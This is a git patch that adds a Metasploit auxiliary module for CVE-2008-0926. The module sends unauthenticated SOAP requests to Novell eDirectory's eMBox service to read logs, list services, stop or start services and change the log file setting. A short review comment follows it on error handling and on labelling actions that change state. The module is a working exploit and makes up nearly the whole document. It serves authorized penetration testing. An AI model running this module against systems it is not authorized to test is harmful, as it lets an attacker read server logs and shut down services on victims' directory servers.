From bb2ea62de8baea05ecc309b57a489ea0c446fe85 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Thu, 15 Dec 2011 23:09:26 -0600
Subject: [PATCH] Add CVE-2008-0926: Novell eDirectory eMBox Unauthenticated Access (Feature #2729)
---
.../admin/edirectory/edirectory_edirutil.rb | 156 ++++++++++++++++++
1 file changed, 156 insertions(+)
create mode 100644 modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
diff --git a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
new file mode 100644
index 0000000000..5ecec93a2c
--- /dev/null
+++ b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
@@ -0,0 +1,156 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell eDirectory eMBox Unauthenticated File Access', + 'Description' => %q{ + This module will access Novell eDirectory's eMBox service and can run the + following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES, + STOP_SERVICE, START_SERVICE, SET_LOGFILE. + }, + 'References' => + [ + [ 'CVE', '2008-0926' ], + [ 'BID', '28441' ], + [ 'OSVDB', '43690' ] + ], + 'Author' => + [ + 'Nicob', + 'MC', #Initial Metasploit module + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'Actions' => + [ + [ + 'GET_DN', + { + 'Description' => 'Get DN', + 'CMD' => 'novell.embox.connmgr.serverinfo', + 'PATTERN' => /(.*)<\/ServerDN>/, + 'USE_PARAM' => false + } + ], + [ + 'READ_LOGS', + { + 'Description' => 'Read all the log files', + 'CMD' => 'logger.readlog', + 'PATTERN' => /(.*)<\/LogFileData>/, + 'USE_PARAM' => false + } + ], + [ + 'LIST_SERVICES', + { + 'Description' => 'List services', + 'CMD' => 'novell.embox.service.getServiceList', + 'PATTERN' => /(.*)<\/DSService:Message>/, + 'USE_PARAM' => false + } + ], + [ + 'STOP_SERVICE', + { + 'Description' => 'Stop a service', + 'CMD' => 'novell.embox.service.stopService', + 'PATTERN' => /(.*)<\/DSService:Message>/, + 'PARAM' => ''+ + '__PARAM__'+ + '', + 'USE_PARAM' => true + } + ], + [ + 'START_SERVICE', + { + 'Description' => 'Start a service', + 'CMD' => 'novell.embox.service.startService', + 'PATTERN' => /(.*)<\/DSService:Message>/, + 'PARAM' => '' + + '' + + '__PARAM__'+ + '', + 'USE_PARAM' => true + } + ], + [ + 'SET_LOGFILE', + { + 
'Description' => 'Read Log File', + 'CMD' => 'logger.setloginfo', + 'PATTERN' => /(.*)<\/Logger:Message>/, + 'PARAM' => '__PARAM__'+ + '', + 'USE_PARAM' => true + } + ] + ], + 'DefaultAction' => 'LIST_SERVICES' + )) + + register_options( + [ + Opt::RPORT(8028), + OptString.new("PARAM", [false, 'Specify a parameter for the action']) + ], self.class) + end + + def run + + if action.opts['USE_PARAM'] + if datastore['PARAM'].nil? or datastore['PARAM'].empty? + print_error("You must supply a parameter for action: #{action.name}") + return + else + param = action.opts['PARAM'].gsub(/__PARAM__/, datastore['PARAM']) + end + else + param = '' + end + + template = %Q| + + + + + #{action.opts['CMD']} + #{param} + + | + + template = template.gsub(/^\t\t/, '') + template = template.gsub(/\n/, '') + + connect + print_status("Sending command: #{action.name}...") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/SOAP', + 'data' => template + "\n\n", + 'headers' => + { + 'Content-Type' => 'text/xml', + 'SOAPAction' => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"", + } + }, 25) + + raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0] + print_line("\n" + Rex::Text.decode_base64(raw_data)) + + disconnect + end +end \ No newline at end of file
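Review bot: At the end of `run`, `res.body.scan(...)` is called without checking what `send_request_cgi` returned, so a nil `res` (for example on a timeout) raises NoMethodError and `disconnect` is never reached. A response that lacks the expected element leaves `raw_data` nil, and the operator gets no indication that the action failed. Guard both, e.g. `raw_data = res.body.scan(action.opts['PATTERN']).flatten[0] if res and res.body`, then `print_error("No usable response for #{action.name}")` when `raw_data` is nil, and call `disconnect` from an `ensure`; `scan` accepts the stored Regexp directly, so the `/#{...}/` wrapper can go. On the documentation side, SET_LOGFILE is described as 'Read Log File' although its CMD is `logger.setloginfo`, and the module name says "File Access" while STOP_SERVICE, START_SERVICE and SET_LOGFILE change state on the target. The module description should state which actions are read-only, so that someone running an authorized assessment does not stop a production service by accident.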